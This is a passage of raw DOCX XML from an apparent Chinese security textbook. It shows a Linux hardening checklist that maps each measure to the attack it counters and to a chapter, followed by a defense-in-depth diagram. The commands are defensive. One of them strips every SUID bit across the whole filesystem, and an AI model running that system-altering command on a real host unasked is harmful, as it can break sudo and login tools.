              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">删除默认低权限用户</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (games, lp </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">等)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">userdel -r games</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">弱口令爆破、凭证填充</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ch5 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">密码爆破，Ch17</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">辅助模块</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">账户与认证</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">禁用</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> root </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">远程</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sed -i 's/^PermitRootLogin yes/PermitRootLogin no/' /etc/ssh/sshd_config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SSH </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">口令爆破、root</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">直接横向</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Ch5，Ch18</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">后渗透横向</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">账户与认证</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">强制口令最短长度、复杂度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">编辑</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/etc/security/pwquality.conf</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">minlen = 12</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">dcredit = -1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">离线哈希破解、在线爆破</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ch15 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">John/Hashcat，Ch17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">文件系统权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/tmp</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">挂载</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> noexec,nosuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">编辑</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/etc/fstab</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">tmpfs /tmp tmpfs defaults,noexec,nosuid 0 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">上传提权工具并执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ch11 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">上传</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> + Ch15 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">提权</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">文件系统权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">移除非必要</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> SUID </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">可执行文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">find / -perm -4000 -type f -exec chmod u-s {} \;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">（经审批后）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SUID </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">提权（自定义二进制）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ch15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">文件系统权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">收紧</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> /etc/shadow </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">chmod 000 /etc/shadow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">读取哈希离线破解</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Ch15，Ch18</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">凭据窃取</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">网络分段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">应用服务器→数据库</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ACL </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">主机</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> iptables </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">规则：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">iptables -A INPUT -s &lt;APP_IP&gt; -p tcp --dport 3306 -j ACCEPT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">从</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Web </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">层横向移动至数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ch9 SQL </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">注入后的横向</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">网络分段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">管理接口独立</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> VLAN + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">堡垒机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">交换机</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> VLAN </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">配置</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ②</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">直接攻击</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> IPMI/iLO </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">默认口令</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ch17 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">辅助扫描</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">补丁管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">启用自动安全更新</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">apt install unattended-upgrades</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">利用已知</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> CVE </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">的提权或代码执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ch15 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">内核漏洞，Ch17</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> exploit/multi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">日志审计</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">记录所有用户命令（auditd</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">规则）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">auditctl -a exit,always -F arch=b64 -S execve -k command_exec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">无日志执行恶意命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ch18 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">后渗透驻留</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">该清单在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capstone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">综合实战（Ch22）中，将被直接引用为“每步攻击对应的防御措施”，以实现全书攻防对称的闭环。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="357"/>
    <w:bookmarkStart w:id="358" w:name="纵深防御的全景视图"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">纵深防御的全景视图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上述主机与网络加固措施，与第19章的检测工程（IDS/IPS/SIEM）以及后续</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch20.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的威胁模型（STRIDE）共同构成完整的预防–检测–响应体系。可以用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mermaid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">简化地刻画防御层次：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flowchart TD</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">A[互联网]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">B[边界防火墙/IPS]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> B --&gt; C[DMZ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">区</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> C --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">D[内部防火墙</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> ACL]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> D --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">E[内网应用服务器]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> E --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">F[数据库服务器]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> B -.- G[SIEM + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志采集]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> C -.- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">H[主机加固</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最小服务/补丁]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> E -.- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">I[主机加固+最小权限]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> F -.- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">J[网络分段+ACL白名单]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
